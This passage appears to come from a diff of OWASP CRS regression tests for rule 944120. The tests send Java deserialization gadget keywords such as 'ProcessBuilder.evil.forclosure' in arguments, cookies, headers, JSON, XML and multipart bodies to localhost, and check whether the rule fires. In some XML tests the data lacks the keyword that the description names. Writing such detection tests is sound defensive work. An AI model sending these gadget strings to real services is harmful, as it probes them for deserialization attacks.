"HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.clonetransformer\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-13 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.clonetransformer\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-14 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.clonetransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-15 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.clonetransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-16 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.clonetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-17 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.clonetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-18 + desc: "Argument test includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.forclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-19 + desc: "Argument name includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-20 + desc: "Cookie test includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.forclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-21 + desc: "Cookie name includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.forclosure=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-22 + desc: "Request header test includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.forclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-23 + desc: "XML element includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-24 + desc: "XML attribute name includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-25 + desc: "XML attribute value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-26 + desc: "XML element value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-27 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-28 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.forclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-29 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.forclosure\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-30 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.forclosure\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-31 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.forclosure": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-32 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.forclosure": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-33 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.forclosure + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-34 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.forclosure + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-35 + desc: "Argument test includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-36 + desc: "Argument name includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-37 + desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.instantiatefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-38 + desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.instantiatefactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-39 + desc: "Request header test includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.instantiatefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-40 + desc: "XML element includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-41 + desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-42 + desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-43 + desc: "XML element value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-44 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-45 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-46 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.instantiatefactory\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-47 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.instantiatefactory\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-48 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.instantiatefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-49 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.instantiatefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-50 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.instantiatefactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-51 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.instantiatefactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-52 + desc: "Argument test includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-53 + desc: "Argument name includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-54 + desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.instantiatetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-55 + desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.instantiatetransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-56 + desc: "Request header test includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.instantiatetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-57 + desc: "XML element includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-58 + desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-59 + desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-60 + desc: "XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 